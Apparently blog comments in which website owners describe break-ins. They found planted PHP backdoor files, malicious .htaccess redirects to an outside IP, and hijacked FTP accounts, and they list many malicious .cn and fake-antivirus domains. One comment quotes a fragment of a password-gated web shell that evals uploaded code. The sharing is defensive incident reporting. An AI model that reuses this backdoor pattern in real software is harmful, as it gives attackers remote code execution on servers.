Just found out a new thing. Looking at my Status and Errors Report I find that somebody tried to access this file ( beta/img/.svn/tmp/ugatef.php ) 4 times.

I look at the Date Over Time report of that file and I see that it is 4 times the same day.

I download all the logs from that day and search for the file ugatef.php.

After the 4 attemps I see that somebody access another file that shouldn’t be on my structure ( /newsletter/content/aceheg.php ).

In this file I find PHP code with these lines:

(…)

if (md5($_POST["p"])==”aace99428c50dbe965acc93f3f275cd3″){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],”rb”),$HTTP_POST_FILES["f"]["size"])){ eval($code);

(…)

If I understand correctly, from here a maliciuos user can execute PHP code as POST from a remote HTML form.

Contact me if you want more info.

Thanks,
alx

The first time it happend I changed all the passwords, desactivated ssh access and disabled all ftp users.

I am a Mac user and I stored the new password as text in my ftp application Cyberduck.

I am still trying to figure out how it happened.

Regards,
Anand

Thank you very much for this information. My website was leading to a malious site when it is searched on Yahoo / Google etc., but it worked fine if we type the name in the address bar. I was totally confused and after reading your article i found that there was an .htaccess exactly as mentioned above that redirects all my search engine traffic to 87 .248.180.90

Now that i removed that entry, my website is back to normal on the search engines.

Thanks again for this article.

Regards,
Aravind. C

the root cause is the same, hijacked ftp accounts.

softwarforgoodusers .cn
frenchfriestaste .cn
tourinternetgide .cn
latenightclick .cn
profileduser .cn
browserpower .cn
fulldeposite .cn
hollywoodstarsnow .cn
securityadvertisement .cn
intendyoseeyou .cn
softwaretripsgoeshere .cn
discostylepromo .cn
someonestrails .cn
refereruser .cn
orderyourdream .cn
gonesurfing .cn
worldwidesphere .cn
getluckywebpagepromo .cn
activeusersearch .cn
styleout .cn
goingdignity .cn
wintertimessport .cn
lostdomains .cn
toplevelawards .cn
hairstylezone .cn
bestgossips .cn
perfectclicks .cn
greatwallnitro .cn
controlledsurfaces .cn
pleasentsurfing .cn
saturationpower .cn
fordgreatcars .cn
teafuntrip .cn
getveryluckytoday .cn
prideandglorynow .cn
worldcommercialbusiness .cn
constructorwebspace .cn
alaskatoursonline .cn
softwareoverworld .cn
tabletpccomputing .cn
securedradiostation .cn

high-protection .info

computerantiviruslivescanner .com
rapidantivirusonlinescan .com
pro-antispyware-scanner .com
premium-antivirus-scan .com
premiumonlinescanner .com
bestanti-virusscan .com
fast-antispyware-scan .com
fastantispywarescanner .com
fast-antivirus-pro-scan .com
antispywareonlinescanner .com
antispywareprolivescan .com
antispywareliveproscan .com
antispywareprolivescanner .com
antispywareinternetproscan .com
antispyware-internet-scan .com
antispyware-premium-scan .com
antispyware-live-pro-scan .com
antispyware-online-scan .com
bestantispywarescan .com
bestantispywarelivescan .com
computerantivirusscanner .com
computerantivirusproscan .com
antimalware-pro-scanner .com
anti-malware-pro-scanner .com
anti-malware-pro-scan .com
antimalware-live-scanner .com
antimalwareliveproscanner .com
antimalwareliveproscanner .com
antimalwareliveproscan .com
antimalware-online-scanner .com
premiumantiviruscheck .com
antimalwaresuperscanner .com
onlineantivirusproscan .com
bestantimalwaredefence .com
liteantispywareproscanner .com
liteantimalwarescanner .com
lite-anti-virus-scan .com
liveantimalwarescan .com
liveantimalwarefastscnan .com
pro-antimalware-scanner .com
fastantimalwareproscanner .com
best-antimalware-pro-scan .com
bestantimalwarelivescanner .com

Every directory in the site had a .htaccess.mal file, which seemed to be a copy of the bad .htaccess file, ready to be copied back perhaps.

The better solution would be remove the malicious code from the .htaccess file and make it write-protected.

Make sure to check the rest instructions